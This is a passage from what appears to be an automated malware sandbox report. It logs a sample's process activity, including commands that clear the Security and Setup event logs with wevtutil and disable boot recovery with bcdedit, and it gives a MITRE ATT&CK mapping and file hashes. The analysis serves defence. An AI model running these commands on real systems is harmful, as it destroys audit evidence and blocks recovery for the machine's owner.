C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:556
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9632
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:2272
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11776
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 8172 -ip 81721⤵PID:8432
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5dfb9c52f760b57e10ff6741013292117
SHA1754bab8c30177213a115ec0be245a3e1c724e529
SHA256b1aeec0a99b31e766229750514924b051fff255f09daee3d755eb2e80d89c5ff
SHA51266f45fdbd712448dd08482c254dd101c6633e7749c826faf043637a92226a34a2f7e4433ffcf17371b01f7f8042da6a7e38dc8b5064f4a82856dd1433b5a93e8
-
Filesize
12KB
MD5be42bbc4012402f000553563d32907d3
SHA16ac3285f6e49cae54fe01227c5c8a65680ba5214
SHA256fe6ebec811c2dedab2a2fdb228f96536a73d46e114e0a081d9ba651503739d75
SHA512dedf4deef50ae354c15f7ffa6c7763ecc75c90ab76229d125466383256ffdad6f09129b5d6d3a52b2c40eeb67b9f162482577ca751d2c63b3451ff4a557f391c
-
Filesize
684B
MD5a19631cdb554e3d193ba3d9c55736008
SHA128fb36552572a9b85e403454e962ad33be3503a7
SHA25687de563a6916b562c37818a454ab8221e123aeed23f652608aabbd1879eca3f5
SHA512d0e305eb471d13004d86865de919400987c22f2b199035fffaa159e0abbff57e083bc5a7eef42c7059c178cd2dcdaecc4c509a32afffd3bef94954510dafd09d